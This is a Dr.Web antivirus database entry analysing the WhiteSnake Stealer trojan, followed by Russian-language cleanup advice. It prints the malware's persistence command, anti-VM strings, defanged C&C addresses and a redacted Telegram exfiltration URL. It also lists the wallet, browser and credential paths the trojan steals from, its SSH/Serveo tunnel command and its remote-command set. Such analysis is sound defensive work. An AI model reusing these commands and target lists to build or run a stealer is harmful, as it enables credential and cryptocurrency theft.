Поддержка
Круглосуточная поддержка

Позвоните

Бесплатно по России:
8-800-333-79-32

ЧаВо | Форум

Ваши запросы

  • Все: -
  • Незакрытые: -
  • Последний: -

Позвоните

Бесплатно по России:
8-800-333-79-32

Свяжитесь с нами Незакрытые запросы: 

Профиль

Профиль

Trojan.Siggen21.39882

Добавлен в вирусную базу Dr.Web: 2023-10-12

Описание добавлено:

Packer: .NET Reactor

SHA1 hash:

  • 9b75ef8a67b412122e03a8209c5d46ea5a8cd957 (original file name: «Дополнительные материалы, перечень вопросов, накладные и первичные документы.exe»)

Description

A trojan application also known as WhiteSnake Stealer. It is written in .NET and targets computers running Microsoft Windows operating systems. Malicious actors use it to steal account data from a variety of software and also to hijack other data. In addition, it allows other apps to be downloaded and run in an infected system.

Operating routine

Verification of execution in virtual machines

Before infecting a target system, the trojan checks the runtime environment to detect whether it was launched in a virtual machine. It does this by accessing the WMI interface. For this, the trojan uses the entity Win32_ComputerSystem entity in the \root\CIMV2 namespace. This entity contains information about the computer’s properties and the installed operating system.

In this structure, the fields Model and Manufacturer are verified to see whether the following strings are present in them:

  • virtual
  • vmbox
  • vmware
  • thinapp
  • VMXh
  • innotek gmbh
  • tpvcgateway
  • tpautoconnsvc
  • vbox
  • kvm
  • red hat
  • qemu

The above fields correspond to the following information:

  • Model ― the name assigned to the computer by its manufacturer;
  • Manufacturer ― the name of the computer manufacturer.

If a virtual machine is detected, the trojan stops working.

Anchoring in the system

The trojan copies itself into the %LOCALAPPDATA%/WindowsSecurity/ directory. Next, it executes a command that looks like this:

cmd.exe /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "<SAMPLE>" /sc MINUTE /tr "%LOCALAPPDATA%\WindowsSecurity\<SAMPLE.EXE>" /rl HIGHEST /f && DEL /F /S /Q /A "<PATH_SAMPLE.EXE>" && START "" "%LOCALAPPDATA%\WindowsSecurity\<SAMPLE.EXE>

where SAMPLE is the name of the malware’s previously copied executable file.

This command performs a number of actions that include:

  1. Changing the console encoding to 65001 (Unicode).
  2. Verifying the availability of a local host.
  3. Creating a task with the following parameters:
    • tn ― task name;
    • tr ― path to the task;
    • sc ― schedule type ― MINUTE;
    • rl ― launching privileges ― HIGHEST (if the trojan is launched without administrative rights, the LIMITED value is used instead);
    • f ― to create a task and disable warnings if a given task already exists.
  4. Deleting the current file from which the trojan was executed.
  5. Running the trojan from %LOCALAPPDATA%\WindowsSecurity\<SAMPLE.EXE>.

Distribution

Depending on the configuration, the trojan can spread in the following ways:

  • by infecting local user accounts;
  • by infecting removable storage devices

When infecting local user accounts, the trojan accesses the WMI interface, and in the \root\CIMV2 namespace, uses the entity Win32_UserAccount, which contains information about Windows user accounts. With the help of this structure, the trojan obtains the full list of users in the infected system. Next, the malicious program copies itself into the startup directory of every user.

When infecting removable storage devices, the trojan obtains the list of all the drives in the system. If any of the detected drives is removable, the malware copies itself to its root directory.

Collecting system information

The first network packet that the trojan sends to the C&C server after infecting the OS is a packet containing system information and the results obtained by executing tasks. The tasks that the trojan executes will be described in more detail in the corresponding section of the malware description.

Below is an example of the data sent in this packet.

Parameter name (Key) The contents (Value) Data-collection method
Username The Windows user name From the UserName environment variable; spaces are replaced with the _ symbol.
Compname The name of the infected computer From the COMPUTERNAME environment variable; spaces are replaced with the _ symbol.
OS The operating system version From the OSVERSIONINFO structure.
Tag res1110myformish A constant string that represents the trojan’s build identifier.
IP The IP address of the infected computer From the response received after contact-ing the hxxp://ip-api[.]com/line?fields=query,country service.
Screen size Screen resolution listed in the format <width>x<height> *
CPU Processor name From the \root\CIMV2 namespace ― Win32_Processor entity ― Name field.
GPU Video controller name From the \root\CIMV2 namespace ― Win32_VideoController entity ― Name field.
RAM The amount of RAM, GB. From the \root\CIMV2 namespace ― Win32_ComputerSystem entity ― TotalPhysicalMemory field.
Disk Disk size, GB. From the \root\CIMV2 namespace ― Win32_LogicalDisk entity.
Model The name given to the computer by its manufacturer. From the \root\CIMV2 namespace ― Win32_ComputerSystem entity ― Model field.
Manufacturer The computer manufacturer’s name From the \root\CIMV2 namespace ― Win32_ComputerSystem entity― Manufacturer field.
Beacon Proxy type A constant string; its value is either serveo or tor.
Stub version 1.6.1.3 A constant that represents the trojan’s build version.
ExeeD The path to the current executed file *
Execution timestamp Current time *
Screenshot A screenshot encoded with base64 *
LoadedAssemblies The list of loaded dll libraries for the current process *
RunningProcesses The list of running processes *
InstalledApplications The list of installed applications From the SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall Display-Name registry branch.

*For fields where the data-collection method is not described, data is obtained by calling standard functions and algorithms for the C# language.

This packet is an XML form that looks like the following:


<Report xmlns:xsd="{http://www.w3.org/2001/XMLSchema"} xmlns:xsi="{http://www.w3.org/2001/XMLSchema-instance"}>
 <files>
   <file filename="" filedata="" filesize="" createdDate="" modifiedDate="" />
   ...
 </files>
 <information>
   <information key=$key_name value=$value /> 
   <information key=$key_name value=$value /> 
   ...  
 </information>
</Report>

where:

  • $key_name and $value ― corresponding fields from the table;
  • files ― contains information about crypto-wallet files, session files, logs, and passwords.

The packet to be sent is encrypted with an RSA algorithm. The public encryption key is built into the trojan as an XML form and is shown below:


<RSAKeyValue>
    <Modulus>     qFKhw3Pbm+8iRzI/nVQppO1DlMBuIXV8x/mcTZJKMCT2MwkzUVD77VLFac3GGj5/vkbipjQP/gdeYSBHxr2KMNKgV8xfzlB5Az+dC3Rgy/bvO9DohGFnEx1CG7NJRuVt/gjy8gWeSOarnkEQIewXx/+D+xN4Fd4NWguHvPhUguI19kFpPx8f9U2/iv9CsctWvknAFadSd0uiNCvi2RIZQIcpFiUElxAezaZfL1w8BZ5vY/Hi/dstLEUyKqEoxq2ch+LIqTZoLYxkojfdOOyGoWgwY4NO7n5z5akqm9wFU00J7MhcbjhkfUPE/Yy6LXI8Q74CcIJqMYRRaNuwChLWLQ==
    </Modulus>
    <Exponent>
        AQAB
    </Exponent>
</RSAKeyValue>

The results from completing tasks are sent both to one of the C&C servers and to a dedicated Telegram chat.

The specifics of transferring data to the C&C server

To select a C&C server IP address, the trojan sends a packet to each address from the available list until the transmission is successful. Below is the list of addresses:


hxxp[:]//213[.]232.255.61:8080
hxxp[:]//88[.]99.71.225:8080
hxxp[:]//51[.]178.53.191:8080
hxxp[:]//78[.]46.66.9:8080
hxxp[:]//135[.]181.206.12:8080
hxxp[:]//217[.]145.238.175:80 
hxxps[:]//164[.]90.185.9:443 
hxxp[:]//94[.]156.6.209:80
hxxp[:]//104[.]248.253.214:80
hxxp[:]//141[.]94.175.31:8098 
hxxp[:]//34[.]207.71.126:80 
hxxp[:]//192[.]99.44.107:8080 
hxxp[:]//107[.]161.20.142:8080 
hxxp[:]//52[.]86.18.77:8080
hxxps[:]//192[.]99.196.191:443 
hxxp[:]//216[.]250.190.139:80 
hxxp[:]//205[.]185.123.66:8080 
hxxp[:]//52[.]26.63.10:9999 
hxxp[:]//24[.]199.110.250:8080 
hxxp[:]//45[.]55.65.93:80 
hxxp[:]//139[.]99.123.53:9191 
hxxps[:]//44[.]228.161.50:443 
hxxp[:]//162[.]33.178.113:80 
hxxp[:]//167[.]71.106.175:80 
hxxp[:]//45[.]76.190.214:1024 
hxxp[:]//154[.]31.165.232:80 
hxxp[:]//168[.]138.211.88:8099 
hxxps[:]//52[.]193.176.117:443 
hxxps[:]//52[.]196.241.27:443 
hxxps[:]//54[.]249.142.23:443 
hxxp[:]//121[.]63.250.132:88

The request is generated as follows:

  • Transmission method: PUT.
  • Route formation: <rand_str>_<username>@<compname>_report.wsr, where:
    • <rand_str> ― a random string with a length of 5 symbols;
    • <username> ― user name;
    • <compname> ― this computer’s name.
  • The transfer is carried out as a file upload.

The specifics of transferring data to a Telegram chat

The following message is formed:


#res1110myformish #Wallets #Beacon
<b>OS:</b> <i><Operating system></i>
<b>Country:</b> <i><Country></i>
<b>Username:</b> <i><Windows user account name></i>
<b>Compname:</b> <i><Computer name></i>
<b>Report size:</b> <Size of the sent XML>Mb

Telegram’s API is used to send the packet. The main URL that contains the API token:


hxxps[:]//api[.]telegram[.]org/bot660*******:AAHL********_******UfVtaKSR2*******

The following request parameters are added to this URL:

  • chat_id=****91**** ― a constant from the malware’s configuration.
  • text=hexlify(data) ― contains the text of the message (described above); the data is converted using the hexlify function.
  • reply_markup= ― contains a json, converted with the hexlify function.
  • parse_mode=HTML.

The data from the json:


{
  "inline_keyboard": [
    [
      {
        "text": "Download",
        "url": ,
      },
      {
        "text": "Open",
        "url": 
      }
    ]
  ]
}

where:

  • <c2_response> ― the C&C server’s response to the sent report;
  • <url> ― the hxxp[:]//127[.]0.0.1:18772/handleOpenWSR?r=<c2_response> address.

Tasks executed when collecting information

The trojan has a built-in XML form with a list of data-collection tasks. This form consists of blocks of tasks that are structured as follows:


<command name="0">
    <args>
        <string>...</string>
        ...
    </args>
</command>

where:

  • name ― the type of task executed;
  • args ― the list of arguments for the task.

Collected data

  1. Collecting data using regular expressions―data is collected in the desired directory, using a regular expression.

    Path to the directory Regular expressions
    %AppData%\Authy Desktop\Local Storage\leveldb *
    %AppData%\dolphin_anty db.json
    %USERPROFILE%\OpenVPN\config *\*.ovpn
    %AppData%\WinAuth *.xml
    %AppData%\obs-studio\basic\profiles *\service.json
    %AppData%\FileZilla sitemanager.xml
    recentservers.xml
    %LocalAppData%\AzireVPN token.txt
    %USERPROFILE%\snowflake-ssh session-store.json
    %ProgramFiles(x86)%\Steam ssfn*
    config\*.vdf
    %Appdata%\Discord\Local Storage\leveldb *.l??
    %AppData%\The Bat! ACCOUNT.???
    %SystemDrive% Account.rec0
    %AppData%\Signal config.json
    sql\db.sqlite
    %AppData%\Session config.json
    sql\db.sqlite
    %AppData%\tox *.db
    *.tox
    *.ini
    *.json
    *.hstr
    %AppData%\.purple accounts.xml
    %AppData%\ledger live app.json
    %AppData%\atomic\Local Storage\leveldb *.l??
    %AppData%\WalletWasabi\Client\Wallets *.json
    %AppData%\Binance *.json
    %AppData%\Guarda\Local Storage\leveldb *.l??
    %LocalAppData%\Coinomi\Coinomi\wallets *.wallet
    %AppData%\Bitcoin\wallets *\*wallet*
    %AppData%\Electrum\wallets *
    %AppData%\Electrum-LTC\wallets *
    %AppData%\Zcash *wallet*dat
    %AppData%\Exodus exodus.conf.json
    exodus.wallet\*.seco
    %AppData%\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb .l??
    %AppData%\Jaxx\Local Storage\leveldb .l??
    %UserProfile%\Documents\Monero\wallets *\*
    %AppData%\MyMonero FundsRequests*
    PasswordMeta*
    Wallets*
    %UserProfile%\Desktop *.txt
    *.doc*
    *.xls*
    *.kbd*
    *.pdf
    %UserProfile%\Downloads *.txt
    *.doc*
    *.xls*
    *.kbd*
    *.pdf
    %AppData%\Telegram Desktop\tdata *s;????????????????\*s
  2. Collecting user profiles―all data is copied from the desired directory:

    Path to the directory
    %AppData%\Google\Chrome\Profiles
    %AppData%\Yandex\YandexBrowser\Profiles
    %AppData%\Vivaldi\Profiles
    %AppData%\CocCoc\Browser\Profiles
    %AppData%\CentBrowser\Profiles
    %AppData%\BraveSoftware\Brave-Browser\Profiles
    %AppData%\Chromium\Profiles
    %AppData%\Microsoft\Edge\Profiles
    %AppData%\Opera Software\Opera Stable
    %AppData%\Opera Software\Opera GX Stable
    %Appdata%\Discord
    %LocalAppdata%\Mozilla\Firefox\Profiles
    %LocalAppdata%\Thunderbird\Profiles
  3. Collecting data about crypto wallets. The list of crypto wallets that malicious actors are interested in:

    The name of the crypto wallet The ID of the corresponding browser plugin
    Metamask nkbihfbeogaeaoehlefnkodbefgpgknn
    Ronin fnjhmkhhmkbjkkabndcnnogagogbneec
    BinanceChain fhbohimaelbohpjbbldcngcnapndodjp
    TronLink ibnejdfjmmkpcnlpebklmnkoeoihofec
    Phantom bfnaelmomeimhlpmgjnjophhpkkoljpa
  4. Collecting data from the Windows registry:

    Registry key Collected values
    SOFTWARE\Martin Prikryl\WinSCP 2\Sessions\* HostName
    UserName
    Password
    SOFTWARE\FTPWare\CoreFTP\Sites\* Host
    Port
    User
    PW
    SOFTWARE\Windscribe\Windscribe2 userId
    authHash

Keylogger registration

The initial keylogger registration is performed when the trojan starts. Its further interaction with the keylogger is carried out through commands received from the C&C server. Keystroke data is saved to the malware’s memory.

Command execution

Before the trojan begins executing commands, it installs a proxy server. The malware’s configuration has a field that is responsible for the proxy type:

  • serveo ― a proxy using the SSH protocol and a Serveo service;
  • tor ― a proxy using the Tor network.

The information about the type of proxy used is sent to the C&C server in the first packet with the system information and is located in the Beacon field.

A proxy server based on the Tor protocol

The trojan verifies whether the Tor application was previously downloaded. This check is performed depending on the availability of the %LOCALAPPDATA%/9hyfy7lwm1/tor\tor-real.exe file. If the program does not exist, the trojan downloads it from the link hxxps[:]//github[.]com/matinrco/tor/releases/download/v0.4.5.10/tor-expert-bundle-v0.4.5.10.zip.

Next, it creates a %LOCALAPPDATA%/9hyfy7lwm1/tor\torrc.txt configuration file for Tor as follows:


SOCKSPort <port> + 1
ControlPort <port> + 2
DataDirectory %LOCALAPPDATA%/9hyfy7lwm1/tor/data
HiddenServiceDir  %LOCALAPPDATA%/9hyfy7lwm1/tor/host
HiddenServicePort 80 127.0.0.1:<port>
HiddenServiceVersion 3

where <port> is the port number on which the Tor application is opened.

Lastly, the trojan launches the app with the command %LOCALAPPDATA%/9hyfy7lwm1/tor\tor-real.exe -f '%LOCALAPPDATA%/9hyfy7lwm1/tor\torrc.txt.

A proxy server based on the SSH protocol and a Serveo service

The trojan verifies whether the OpenSSH instrument was downloaded earlier. This check is performed by referring to the SOFTWARE\OpenSSH Windows registry key. If such a key does not exist, the trojan downloads a ZIP archive containing the program, using the link hxxps[:]//github[.]com/PowerShell/Win32-OpenSSH/releases/download/v9.2.2.0p1-Beta/OpenSSH-Win32.zip and places it into %TEMP%/ssh-000.zip.

Next, it unpacks the archive and launches OpenSSH with the following command:

ssh.exe -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:1233 serveo[.]net

where:

  • o ― options ― these are the parameters of the launch;
  • R ― address ― this is the Serveo service address.

Commands executed by the trojan

After the proxy server is initialized, the trojan creates httpListner and connects to the created server. Next, it waits for commands to arrive.

Below is the list of commands available to the trojan:

Command name Description
PING

The following response to the C&C server is generated: PONG >> <title> >> <keys> >> 0, where:

  • title is the current process name;
  • keys is the data collected by the keylogger.
UNINSTALL

Removing the trojan from the infected system:

  • The currently running malware process is stopped;
  • The command cmd /C chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A "<PATH_SAMPLE.EXE>" is launched to delete the trojan executable file.
REFRESH The re-collection of system information and user data.
SCREENSHOT A screenshot is taken.
NETDISCOVER A separate thread is created to scan the local network.
DPAPI <data> The trojan decrypts user data that was previously uploaded to the C&C server and can only be decrypted locally on the infected computer. The encrypted data is sent in the argument.
WEBCAM A picture is taken with the web camera.
COMPRESS <file_name> The specified file is placed into a ZIP archive. The name of target file is sent in the argument.
DECOMPRESS <file_name> A file is extracted from a target ZIP archive. The name of the target archive is sent in the argument.
TRANSFER Not implemented.
GET_FILE <file_name> The trojan reads the contents of the target file. The name of the target file is sent in the argument.
LIST_FILES The current directory is listed.
LIST_PROCESSES The trojan creates a list of running processes.
EXPOSE <ip> <port> <http_version>

The trojan launches an SSH session. The arguments are:

  • The IP address to connect to;
  • The port number;
  • The HTTP protocol version (HTTP or HTTPS).
PROXY_SETUP

The trojan enrolls a SOCKS5 proxy server in the infected system:

  • it installs the socks5_proxy application that is downloaded from hxxps[:]//github[.]com/wzshiming/socks5/releases/download/v0.4.2/socks5_windows_amd64.exe and saved to %LOCALAPPDATA%/9hyfy7lwm1/proxy.exe;
  • it generates a random port;
  • it launches proxy.exe -a 127.0.0.1:<random_port>;
  • it connects to this port via the SSH protocol.
KEYLOGGER START Launches the keylogger.
KEYLOGGER STOP Stops the keylogger.
KEYLOGGER VIEW Receives data recorded by the keylogger.
LOADEXEC <url> Downloads a file and launches it. The argument is the URL for downloading the target file.
LOADER <url> Downloads a file. The argument is the URL leading to the target file.
cd <path> The current directory is changed. The argument is the path to change the target directory to.

Indicators of compromise

News about the trojan

Рекомендации по лечению

  1. В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
  2. Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Скачать Dr.Web

По серийному номеру

Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store.

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Скачать Dr.Web

По серийному номеру

  1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
  2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
    • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
    • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
    • выключите устройство и включите его в обычном режиме.

Подробнее о Dr.Web для Android

Демо бесплатно на 14 дней

Выдаётся при установке